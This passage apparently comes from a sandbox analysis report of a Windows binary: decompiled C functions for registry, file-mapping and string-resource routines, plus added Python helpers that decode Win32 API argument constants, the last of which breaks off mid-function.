                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                              					_pop(_t31);
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				_t17 =  *0x12608f8; // 0x0
                                                                                                                                                                                                                              				return E01259A40(_t17, _t27, _v8 ^ _t35, _t30, _t31, _t33);
			}

Assembly (only the instruction addresses survived extraction, 0x0125d178 through 0x0125d21f; the instruction text is not available here)

APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383},00000000,00000001,0125D9E1,?), ref: 0125D1A8
• RegQueryValueExW.ADVAPI32(0125D9E1,Locale,00000000,00000000,?,00000006,00000000), ref: 0125D1C5
• RegCloseKey.ADVAPI32(0125D9E1), ref: 0125D1D0
• _wcsnicmp.MSVCRT ref: 0125D1E8
Strings
• Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 0125D19E
• Locale, xrefs: 0125D1BD
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CloseOpenQueryValue_wcsnicmp
• String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
• API String ID: 2262609651-1161606707
• Opcode ID: f43d4bab843282c08e75713027d99e412e6bf4e9acb449749912c3c8fc26d1de
• Instruction ID: 600bdf055e9e05f788e7395a2db29b9fd0447ba7fdb393f9258807ed036d72ee
• Opcode Fuzzy Hash: f43d4bab843282c08e75713027d99e412e6bf4e9acb449749912c3c8fc26d1de
• Instruction Fuzzy Hash: D211EF75A2024AA7CF719BA5AC8CEBF77B8FB81781F004015FD12E2199D6309950D7A4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0125D4C4(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				void* _t17;
				void* _t18;
				signed int _t19;

				if(__ecx != 0) {
					if(__edx == 0) {
						return LoadLibraryExW(__ecx, 0, 0 | _a4 != 0x00000000);
					}
					_t18 = CreateFileW(__ecx, 0x80000000, 5, 0, 3, 0, 0);
					if(_t18 == 0xffffffff) {
						goto L1;
					}
					_t17 = CreateFileMappingW(_t18, 0, 8, 0, 0, 0);
					CloseHandle(_t18);
					if(_t17 == 0) {
						goto L1;
					}
					_t19 = MapViewOfFile(_t17, 1, 0, 0, 0);
					CloseHandle(_t17);
					if(_t19 == 0) {
						goto L1;
					}
					return _t19 | 0x00000001;
				}
				L1:
				return 0;
                                                                                                                                                                                                                              			}

Statement addresses (side column of the listing above, in listing order; 0x00000000 where the decompiler assigned no address):
0x0125d4ce 0x0125d4d6 0x00000000 0x0125d53a 0x0125d4ed 0x0125d4f2 0x00000000 0x00000000 0x0125d502 0x0125d504 0x0125d50c 0x00000000 0x00000000 0x0125d51b 0x0125d51d 0x0125d525 0x00000000 0x00000000 0x00000000 0x0125d52a 0x0125d4d0 0x00000000

APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4E7
• CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4FB
• CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D504
• MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D514
• CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D51D
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: File$CloseCreateHandle$MappingView
• String ID:
• API String ID: 1095920306-0
• Opcode ID: 42eb5e87668cbbc9e412991cfc56681d3ff896038f6afddee05172ae8fe5679c
• Instruction ID: bc36f1e848152bb40f43954dde019ba6eb73a40f5f85cd2f30348ac141e8887f
• Opcode Fuzzy Hash: 42eb5e87668cbbc9e412991cfc56681d3ff896038f6afddee05172ae8fe5679c
• Instruction Fuzzy Hash: 1301B1B2620219BFF77026B96CCCF77695CDB84AADF148124FF01E20C4E571AC5042B0
Uniqueness

Uniqueness Score: -1.00%
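The argument values in the APIs trace above are raw hex, so the access mode of the mapping has to be worked out by hand. The following Python is an added example, not part of the Joe Sandbox report or of the analysed binary: it parses the five trace lines of this function (copied from the report) and names the Win32 constants they carry, using the standard flag values from winnt.h / memoryapi.h. Joe Sandbox appends stack context after an API's real parameters, so only the positions that matter are decoded and any unknown bits are left as hex.

```python
"""Decode the argument constants in Joe Sandbox 'APIs' trace lines (added example)."""
import re

# Standard Win32 flag values (winnt.h / fileapi.h / memoryapi.h).
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
          0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
             0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MAP_ACCESS = {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ",
              0x20: "FILE_MAP_EXECUTE"}

# (argument index, parameter name, flag table, is_bitmask) for the arguments worth decoding.
DECODERS = {
    "CreateFileW": [(1, "dwDesiredAccess", ACCESS, True),
                    (2, "dwShareMode", SHARE, True),
                    (4, "dwCreationDisposition", DISPOSITION, False)],
    "CreateFileMappingW": [(2, "flProtect", PAGE_PROT, False)],
    "MapViewOfFile": [(1, "dwDesiredAccess", MAP_ACCESS, True)],
}

# One trace line: optional bullet, API.MODULE, optional (args), 'ref: ADDRESS'.
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


def parse_args(text):
    """Turn '?,80000000,00000005' into [None, 0x80000000, 5]; '?' is an unresolved value."""
    if not text:
        return []
    return [None if a.strip() == "?" else int(a.strip(), 16) for a in text.split(",")]


def flag_names(value, table, bitmask):
    """Render a numeric argument symbolically; bits not in the table stay as hex."""
    if value is None:
        return "?"
    if not bitmask:
        return table.get(value, hex(value))
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def decode_api_lines(lines):
    """Parse trace lines into dicts: api, module, ref address, raw args and decoded args."""
    out = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        args = parse_args(m.group("args"))
        decoded = {}
        for idx, pname, table, bitmask in DECODERS.get(m.group("api"), []):
            if idx < len(args):
                decoded[pname] = flag_names(args[idx], table, bitmask)
        out.append({"api": m.group("api"), "module": m.group("mod"),
                    "ref": int(m.group("ref"), 16), "args": args, "decoded": decoded})
    return out


# The five trace lines of this function, copied verbatim from the report.
REPORT_LINES = [
    "• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4E7",
    "• CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D4FB",
    "• CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D504",
    "• MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,0125D9D3,00000000), ref: 0125D514",
    "• CloseHandle.KERNEL32(00000000,?,0125D9D3,00000000), ref: 0125D51D",
]

if __name__ == "__main__":
    for call in decode_api_lines(REPORT_LINES):
        print(f"{call['ref']:08X} {call['module']}!{call['api']} {call['decoded']}")
```

Run on the lines above, the decoder reports GENERIC_READ with FILE_SHARE_READ|FILE_SHARE_DELETE and OPEN_EXISTING for CreateFileW, PAGE_WRITECOPY for the section and FILE_MAP_COPY for the view: the function opens an existing file read-only and maps a private copy-on-write image of it, which matches the C listing. Share mode 5 is READ|DELETE, not READ|WRITE, which is easy to misread from the raw value.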

C-Code - Quality: 90%
			E0125CDCC(int __ecx, void** __edx) { /* __ecx: string resource id; __edx: receives the malloc'd buffer */
				int _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _t5;
				signed short _t6;
				void** _t13;
				void* _t20;
				signed short _t23;

				_push(__ecx);
				_push(__ecx);
				_t23 = 0; /* S_OK unless an error path overwrites it */
				_v8 = __ecx;
				_t13 = __edx;
				_t5 = GetModuleHandleW(0); /* module handle of the running executable */
				_v12 = _t5;
				if(_t5 == 0) {
					_t6 = GetLastError();
					if(_t6 > 0) {
						_t6 = _t6 & 0x0000ffff | 0x80070000; /* HRESULT_FROM_WIN32 */
					}
					L10:
					return _t6;
				}
				_t20 = malloc(0xca); /* 202 bytes: 101 UTF-16 code units */
				if(_t20 == 0) {
					L5:
					_t23 = GetLastError();
					if(_t23 > 0) {
						_t23 = _t23 & 0x0000ffff | 0x80070000; /* HRESULT_FROM_WIN32 */
					}
					L7:
					_t6 = _t23;
					goto L10;
				}
				/* unsigned compare: only 1..99 characters copied is accepted (0 - 1 wraps to 0xffffffff) */
				if(LoadStringW(_v12, _v8, _t20, 0x64) - 1 > 0x62) {
					free(_t20);
					goto L5;
				} else {
					 *_t13 = _t20; /* the caller receives and now owns the buffer */
					goto L7;
				}
			}

Statement addresses (side column of the listing above, in listing order; 0x00000000 where the decompiler assigned no address):
0x0125cdd1 0x0125cdd2 0x0125cdd5 0x0125cdd7 0x0125cddb 0x0125cddd 0x0125cde3 0x0125cde8 0x0125ce38 0x0125ce40 0x0125ce45 0x0125ce45 0x0125ce4a 0x0125ce4f 0x0125ce4f 0x0125cdf6 0x0125cdfb 0x0125ce1e 0x0125ce24 0x0125ce28 0x0125ce2d 0x0125ce2d 0x0125ce33 0x0125ce33 0x00000000 0x0125ce35 0x0125ce10 0x0125ce17 0x00000000 0x0125ce12 0x0125ce12 0x00000000 0x0125ce12

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000076,00000076,?,0125BF30), ref: 0125CDDD
                                                                                                                                                                                                                              • malloc.MSVCRT ref: 0125CDF0
                                                                                                                                                                                                                              • LoadStringW.USER32(0125BF30,?,00000000,00000064), ref: 0125CE06
                                                                                                                                                                                                                              • free.MSVCRT(00000000), ref: 0125CE17
                                                                                                                                                                                                                              • GetLastError.KERNEL32(0125BF30), ref: 0125CE1E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,0125BF30), ref: 0125CE38
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$HandleLoadModuleStringfreemalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2048582471-0
                                                                                                                                                                                                                              • Opcode ID: 69131a193b6ea677ddeb3755406ddc4407a48096967cb4b128d1f6ad363e19fc
                                                                                                                                                                                                                              • Instruction ID: b5f6e747ea750718e10b2c2e09f7c697d3ddd66851df5fbded2c603d1dc2f219
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69131a193b6ea677ddeb3755406ddc4407a48096967cb4b128d1f6ad363e19fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97014C32620325EBD7301B9DE88DA6B7A7CEB85661B10415AFD01D7280EA71EC30A7E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                                                              			E0125F01B(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, char _a12) {
                                                                                                                                                                                                                              				signed int _v4;
                                                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                                                              				char _v152;
                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                                              				char* _t54;
                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                              				signed char _t65;
                                                                                                                                                                                                                              				intOrPtr* _t66;
                                                                                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                              				signed char _t77;
                                                                                                                                                                                                                              				signed int _t89;
                                                                                                                                                                                                                              
                                                                                                                                                                                                                              				_t76 = __esi;
                                                                                                                                                                                                                              				_t73 = __edi;
                                                                                                                                                                                                                              				_t59 = __ebx;
                                                                                                                                                                                                                              				_push(0x8c);
                                                                                                                                                                                                                              				E0125A5F0(E0125AB59, __ebx, __edi, __esi);
                                                                                                                                                                                                                              				_t37 = _a8 & 0x00000017;
                                                                                                                                                                                                                              				 *(__ecx + 8) = _t37;
                                                                                                                                                                                                                              				_t65 =  *(__ecx + 0xc) & _t37;
                                                                                                                                                                                                                              				if(_t65 == 0) {
                                                                                                                                                                                                                              					return E0125A59F(__ebx, __edi, __esi);
                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                              					if(_a12 != 0) {
                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                              						if((_t65 & 0x00000004) == 0) {
                                                                                                                                                                                                                              							__eflags = _t65 & 0x00000002;
                                                                                                                                                                                                                              							if((_t65 & 0x00000002) == 0) {
                                                                                                                                                                                                                              								E0125E172(__ebx,  &_v112, "ios_base::eofbit set");
                                                                                                                                                                                                                              								_v4 = 2;
                                                                                                                                                                                                                              								_push( &_v112);
                                                                                                                                                                                                                              								_t65 =  &_v152;
                                                                                                                                                                                                                              								E0125E223(__ebx, _t65, __edi, __esi, __eflags);
                                                                                                                                                                                                                              								_push(0x125f600);
                                                                                                                                                                                                                              								_t54 =  &_v152;
                                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                              								E0125E172(__ebx,  &_v44, "ios_base::failbit set");
                                                                                                                                                                                                                              								_v4 = 1;
                                                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                              							return _t77;
                                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							E0125E172(__ebx,  &_v44, "ios_base::badbit set");
                                                                                                                                                                                                                              							_t8 =  &_v4;
                                                                                                                                                                                                                              							 *_t8 = _v4 & 0x00000000;
                                                                                                                                                                                                                              							_t89 =  *_t8;
                                                                                                                                                                                                                              							L4:
                                                                                                                                                                                                                              							_push( &_v44);
                                                                                                                                                                                                                              							_t65 =  &_v84;
                                                                                                                                                                                                                              							E0125E223(_t59, _t65, _t73, _t76, _t89);
                                                                                                                                                                                                                              							_push(0x125f600);
                                                                                                                                                                                                                              							_t54 =  &_v84;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                              						_push(_t54);
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					L01259E2C();
                                                                                                                                                                                                                              					asm("int3");
                                                                                                                                                                                                                              					_push(_t65);
                                                                                                                                                                                                                              					_push(_t59);
                                                                                                                                                                                                                              					_t60 = _v8;
                                                                                                                                                                                                                              					_push(_t76);
                                                                                                                                                                                                                              					_t77 = _t65;
                                                                                                                                                                                                                              					_push(_t73);
                                                                                                                                                                                                                              					_t39 =  *((intOrPtr*)(_t77 + 0x14));
                                                                                                                                                                                                                              					if(_t39 < _t60) {
                                                                                                                                                                                                                              						E0125A512();
                                                                                                                                                                                                                              						_t39 =  *((intOrPtr*)(_t77 + 0x14));
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					_t74 = _a8;
                                                                                                                                                                                                                              					_t40 = _t39 - _t60;
                                                                                                                                                                                                                              					if(_t40 < _t74) {
                                                                                                                                                                                                                              						_t74 = _t40;
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					if(_t74 != 0) {
                                                                                                                                                                                                                              						_t71 =  *((intOrPtr*)(_t77 + 0x18));
                                                                                                                                                                                                                              						_t66 = _t77 + 4;
                                                                                                                                                                                                                              						if(_t71 < 0x10) {
                                                                                                                                                                                                                              							_v8 = _t66;
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							_v8 =  *_t66;
                                                                                                                                                                                                                              							_t60 = _a4;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						if(_t71 >= 0x10) {
                                                                                                                                                                                                                              							_t66 =  *_t66;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						__imp__memmove_s(_t66 + _t60, _t71 - _t60, _v8 + _t60 + _t74, _t40 - _t74);
                                                                                                                                                                                                                              						E0125EABA(_t77,  *((intOrPtr*)(_t77 + 0x14)) - _t74);
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					goto L23;
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				L24:
			}


                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125F025
                                                                                                                                                                                                                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0125F0CC
                                                                                                                                                                                                                                • Part of subcall function 0125E223: __EH_prolog3.LIBCMT ref: 0125E22A
                                                                                                                                                                                                                                • Part of subcall function 0125E223: ??0exception@@QAE@XZ.MSVCRT ref: 0125E234
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ??0exception@@ExceptionH_prolog3H_prolog3_Throw
                                                                                                                                                                                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 881692067-1866435925
                                                                                                                                                                                                                              • Opcode ID: a55ce954e5ccc095245db031c206578bf7e164cd3b48134e187223eb3309e7a5
                                                                                                                                                                                                                              • Instruction ID: 41d0b29651729a3fc9a508af979e13b33a4be0ef43cd58eb1a080a57332207e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a55ce954e5ccc095245db031c206578bf7e164cd3b48134e187223eb3309e7a5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F118671930109EADBD4DB64CAC2FFDB374AB24300F54C049DD05AB085EB705B49CB60
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                                                                                              			E0125C5FD(void* __ebx, WCHAR* __ecx, void* __edi, intOrPtr __esi, void* __eflags) {
                                                                                                                                                                                                                              				intOrPtr* _t46;
                                                                                                                                                                                                                              				void* _t50;
                                                                                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                                                                                              				signed int _t56;
                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                              				signed int _t62;
                                                                                                                                                                                                                              				intOrPtr* _t65;
                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                              				long _t73;
                                                                                                                                                                                                                              				WCHAR* _t96;
                                                                                                                                                                                                                              				intOrPtr* _t97;
                                                                                                                                                                                                                              				void* _t99;
    void* _t100;

    _t98 = __esi;
    _push(0x18);
    E0125A5F0(E0125A897, __ebx, __edi, __esi);
    _t96 = __ecx;
    *(_t99 - 0x24) = __ecx;
    *((intOrPtr*)(_t99 - 4)) = 0;
    _t73 = 1;
    *((intOrPtr*)(_t99 - 0x18)) = 0;
    if( *((intOrPtr*)(_t99 + 8)) != 0 && E01259200(__ecx) == 0) {
        // Probe that the path in _t96 can be opened for reading and close it again:
        // dwDesiredAccess = 1 (FILE_READ_DATA), dwShareMode = 1 (FILE_SHARE_READ),
        // dwCreationDisposition = 3 (OPEN_EXISTING).
        _t50 = CreateFileW(_t96, 1, 1, 0, 3, 0, 0);
        if(_t50 != 0xffffffff) { // INVALID_HANDLE_VALUE
            CloseHandle(_t50);
            *(_t99 - 0x14) = *(_t99 - 0x14) & 0x00000000;
            *((char*)(_t99 - 4)) = 1;
            _t52 = *((intOrPtr*)(_t99 + 8));
            // Pattern repeated below: load a virtual-call target from a vtable, pass it through
            // the function pointer at 0x1261204, then call it. This is consistent with a Control
            // Flow Guard __guard_check_icall thunk; the decompiler renders the check as a call
            // that takes the real call's arguments. The vtable slots (+0xf0, +0x24, +0x2c, +0x30)
            // are not named anywhere in this report.
            _t98 = *((intOrPtr*)( *_t52 + 0xf0));
            *0x1261204(_t52, _t99 - 0x14);
            if( *((intOrPtr*)( *((intOrPtr*)( *_t52 + 0xf0))))() < 0) {
                L13:
                _t73 = 0;
                *((char*)(_t99 - 4)) = 0;
            } else {
                _t56 = *(_t99 - 0x14);
                if(_t56 == 0) {
                    goto L13;
                } else {
                    // Out-parameter at [_t99 - 0x18] receives a string (freed via ordinal 6 below).
                    _t98 = *((intOrPtr*)( *_t56 + 0x24));
                    *0x1261204(_t56, _t99 - 0x18);
                    if( *((intOrPtr*)( *((intOrPtr*)( *_t56 + 0x24))))() < 0 || *((intOrPtr*)(_t99 - 0x18)) == 0) {
                        goto L13;
                    } else {
                        _t59 = *(_t99 - 0x14);
                        *(_t99 - 0x20) = *(_t99 - 0x20) | 0xffffffff; // sentinel -1 before the out-param call
                        _t98 = *((intOrPtr*)( *_t59 + 0x2c));
                        *0x1261204(_t59, _t99 - 0x20);
                        if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x2c))))() < 0 || *(_t99 - 0x20) == 0xffffffff) {
                            goto L13;
                        } else {
                            _t62 = *(_t99 - 0x14);
                            *(_t99 - 0x1c) = *(_t99 - 0x1c) | 0xffffffff; // sentinel -1 before the out-param call
                            _t98 = *((intOrPtr*)( *_t62 + 0x30));
                            *0x1261204(_t62, _t99 - 0x1c);
                            if( *((intOrPtr*)( *((intOrPtr*)( *_t62 + 0x30))))() < 0 || *(_t99 - 0x1c) == 0xffffffff) {
                                goto L13;
                            } else {
                                // Success path: hand the path, the string and both values to slot +4
                                // of the global object at 0x12606dc, with constants 0 and 0x20.
                                _t65 = *0x12606dc; // 0x3403de0
                                _t98 = *_t65;
                                *0x1261204(_t65, 0, 0x20, _t96, *((intOrPtr*)(_t99 - 0x18)), *(_t99 - 0x20), *(_t99 - 0x1c));
                                *((intOrPtr*)( *_t65 + 4))();
                                _t100 = _t100 + 0x1c;
                                *((char*)(_t99 - 4)) = 0;
                            }
                        }
                    }
                }
            }
            E01259691(_t99 - 0x14);
        } else {
            // CreateFileW failed: report GetLastError() and the path via slot +8 of the same
            // global object, with constant 0x1f.
            _t68 = GetLastError();
            _t97 = *0x12606dc; // 0x3403de0
            _t98 = *((intOrPtr*)( *_t97 + 8));
            *0x1261204(_t68, 0x1f, *(_t99 - 0x24));
            *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
            _t96 = *(_t99 - 0x24);
        }
    }
    // Ordinal-6 import; if it comes from oleaut32.dll this is SysFreeString, releasing the
    // string obtained through the +0x24 call above (SysFreeString accepts NULL).
    __imp__#6( *((intOrPtr*)(_t99 - 0x18)));
    if(_t73 == 0) {
        // Any failure above: a second call into slot +4 of the global object, with constant 0xd and the path.
        _t46 = *0x12606dc; // 0x3403de0
        _t98 = *_t46;
        *0x1261204(_t46, 0, 0xd, _t96);
        *((intOrPtr*)( *_t46 + 4))();
    }
    E01259691(_t99 + 8);
    return E0125A59F(_t73, _t96, _t98);
}
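The decompiled function above passes the CreateFileW parameters as bare integers (1, 1, 0, 3, 0, 0), and reading those numbers correctly is what identifies the call as "open an existing file for read, then close it". The following is an added example written for this page, not code from the report, the sandbox or the analysed sample: a small Python helper that finds CreateFileA/CreateFileW calls in decompiler pseudo-C, decodes the numeric arguments into Win32 constant names (bitmask-aware, with unknown bits kept as hex, and symbolic arguments left as "?"), and appends the result as a comment. The constant tables are the Windows SDK values; the sample input lines other than the one copied from the function above are constructed.

```python
import re

# Win32 constants for the CreateFile{A,W} parameters (values from the Windows SDK headers).
ACCESS = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
    0x00100000: "SYNCHRONIZE", 0x00080000: "WRITE_OWNER", 0x00040000: "WRITE_DAC",
    0x00020000: "READ_CONTROL", 0x00010000: "DELETE",
    0x100: "FILE_WRITE_ATTRIBUTES", 0x80: "FILE_READ_ATTRIBUTES", 0x40: "FILE_DELETE_CHILD",
    0x20: "FILE_EXECUTE", 0x10: "FILE_WRITE_EA", 0x8: "FILE_READ_EA",
    0x4: "FILE_APPEND_DATA", 0x2: "FILE_WRITE_DATA", 0x1: "FILE_READ_DATA",
}
SHARE = {0x4: "FILE_SHARE_DELETE", 0x2: "FILE_SHARE_WRITE", 0x1: "FILE_SHARE_READ"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = {
    0x80000000: "FILE_FLAG_WRITE_THROUGH", 0x40000000: "FILE_FLAG_OVERLAPPED",
    0x20000000: "FILE_FLAG_NO_BUFFERING", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x80: "FILE_ATTRIBUTE_NORMAL",
    0x20: "FILE_ATTRIBUTE_ARCHIVE", 0x10: "FILE_ATTRIBUTE_DIRECTORY",
    0x4: "FILE_ATTRIBUTE_SYSTEM", 0x2: "FILE_ATTRIBUTE_HIDDEN", 0x1: "FILE_ATTRIBUTE_READONLY",
}


def decode_mask(value, table):
    """Render a 32-bit flag word as 'NAME|NAME|0x..'; bits missing from the table stay as hex."""
    value &= 0xFFFFFFFF
    if value == 0:
        return "0"
    names = []
    for bit in sorted(table, reverse=True):  # widest (GENERIC_*) bits first
        if value & bit:
            names.append(table[bit])
            value &= ~bit
    if value:
        names.append(hex(value))
    return "|".join(names)


def parse_int(token):
    """Numeric literal (decimal or 0x-hex) -> int; a register or expression -> None."""
    try:
        return int(token, 0)
    except ValueError:
        return None


def split_args(text):
    """Split the text after '(' at top-level commas, stopping at the matching ')'."""
    args, depth, current = [], 0, ""
    for ch in text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:
                break
            depth -= 1
        elif ch == "," and depth == 0:
            args.append(current.strip())
            current = ""
            continue
        current += ch
    args.append(current.strip())
    return args


def describe_createfile(values):
    """values: the six arguments after lpFileName, as ints or None when symbolic."""
    access, share, security, disposition, flags, template = values

    def fmt(v, table):
        return "?" if v is None else decode_mask(v, table)

    parts = [
        "access=" + fmt(access, ACCESS),
        "share=" + fmt(share, SHARE),
        "disposition=" + ("?" if disposition is None else DISPOSITION.get(disposition, hex(disposition))),
        "flags=" + fmt(flags, FLAGS),
    ]
    if security:
        parts.append("security_attrs=nonzero")
    if template:
        parts.append("template=nonzero")
    return ", ".join(parts)


CALL_RE = re.compile(r"\bCreateFile[AW]\s*\(")


def annotate_line(line):
    """Append a decoded comment to a decompiled line that calls CreateFileA/W; others pass through."""
    m = CALL_RE.search(line)
    if not m:
        return line
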